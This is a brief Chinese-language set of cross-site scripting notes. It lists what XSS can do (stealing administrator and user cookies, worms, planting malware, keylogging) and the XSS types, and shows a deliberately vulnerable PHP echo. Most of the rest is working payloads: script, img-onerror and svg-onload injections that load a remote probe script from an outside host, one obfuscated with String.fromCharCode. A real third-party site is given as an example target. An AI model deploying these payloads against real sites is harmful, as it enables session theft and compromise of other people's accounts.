什么是XSS
XSS可以干什么
盗取管理员Cookie或用户Cookie
XSS Worm
挂马(水坑***)
有局限性的键盘记录
XSS分类
放射性XSS
存储型XSS
DOM XSS
flash XSS
mXSS
反射(非持久)型XSS
xss.php
<?php
echo $_GET['x']
?>
#提交
/xss.php?x=<script>alert(1)</script>
#eg:http://www.nfpeople.com/user.php?id=21839
<script src='http://b.ioio.pub/xss/probe.js'></script>
<img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js'";>
<svg onload=s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js>
<svg onload=eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,
101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,9
7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,
99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,
47,120,115,115,47,112,114,111,98,101,46,106,115)) >